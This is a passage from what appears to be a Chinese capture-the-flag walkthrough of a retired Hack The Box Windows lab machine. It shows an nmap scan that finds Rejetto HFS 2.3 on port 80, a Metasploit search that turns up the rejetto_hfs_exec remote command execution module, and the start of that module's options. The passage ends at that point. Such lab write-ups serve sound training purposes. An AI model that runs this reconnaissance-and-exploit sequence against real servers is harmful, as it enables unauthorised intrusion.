这是HTB retire machine的第六台靶机
目录
执行windows-exploit-suggester.py
0x00 靶机情况
可以看到这台靶机是windows的靶机,难度值为容易。
0x01 信息搜集
端口扫描
root@kali:~# nmap -T5 -A -v 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 00:43 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating Ping Scan at 00:43
Scanning 10.10.10.8 [4 ports]
Completed Ping Scan at 00:43, 0.55s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:43
Completed Parallel DNS resolution of 1 host. at 00:43, 0.27s elapsed
Initiating SYN Stealth Scan at 00:43
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.03% done; ETC: 00:44 (0:01:13 remaining)
Increasing send delay for 10.10.10.8 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 18.87% done; ETC: 00:46 (0:02:52 remaining)
SYN Stealth Scan Timing: About 24.80% done; ETC: 00:48 (0:03:32 remaining)
SYN Stealth Scan Timing: About 50.07% done; ETC: 00:49 (0:03:15 remaining)
SYN Stealth Scan Timing: About 56.67% done; ETC: 00:50 (0:02:55 remaining)
SYN Stealth Scan Timing: About 62.60% done; ETC: 00:50 (0:02:35 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 00:50 (0:02:12 remaining)
SYN Stealth Scan Timing: About 74.67% done; ETC: 00:50 (0:01:49 remaining)
SYN Stealth Scan Timing: About 80.63% done; ETC: 00:50 (0:01:25 remaining)
SYN Stealth Scan Timing: About 86.60% done; ETC: 00:50 (0:00:59 remaining)
SYN Stealth Scan Timing: About 92.57% done; ETC: 00:50 (0:00:33 remaining)
Completed SYN Stealth Scan at 00:50, 451.02s elapsed (1000 total ports)
Initiating Service scan at 00:50
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:50, 7.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:51
Completed Traceroute at 00:51, 0.35s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:51
Completed Parallel DNS resolution of 2 hosts. at 00:51, 0.27s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:51
Completed NSE at 00:51, 8.54s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 2.41s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.33s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Tue Feb 4 00:37:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 339.56 ms 10.10.14.1
2 341.07 ms 10.10.10.8
NSE: Script Post-scanning.
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 486.38 seconds
Raw packets sent: 3354 (152.624KB) | Rcvd: 384 (26.969KB)
可以看到只开了一个端口80。
检索应用
打开主页看下:
我们看到主页上已经说明了开启了的应用为HFS V2.3。
那我们直接就搜索一下漏洞:
msf5 exploit(windows/http/rejetto_hfs_exec) > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
看到确实有存在一个可以使用的漏洞
0x02 get webshell
设置相关的参数之后,执行漏洞利用模块
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0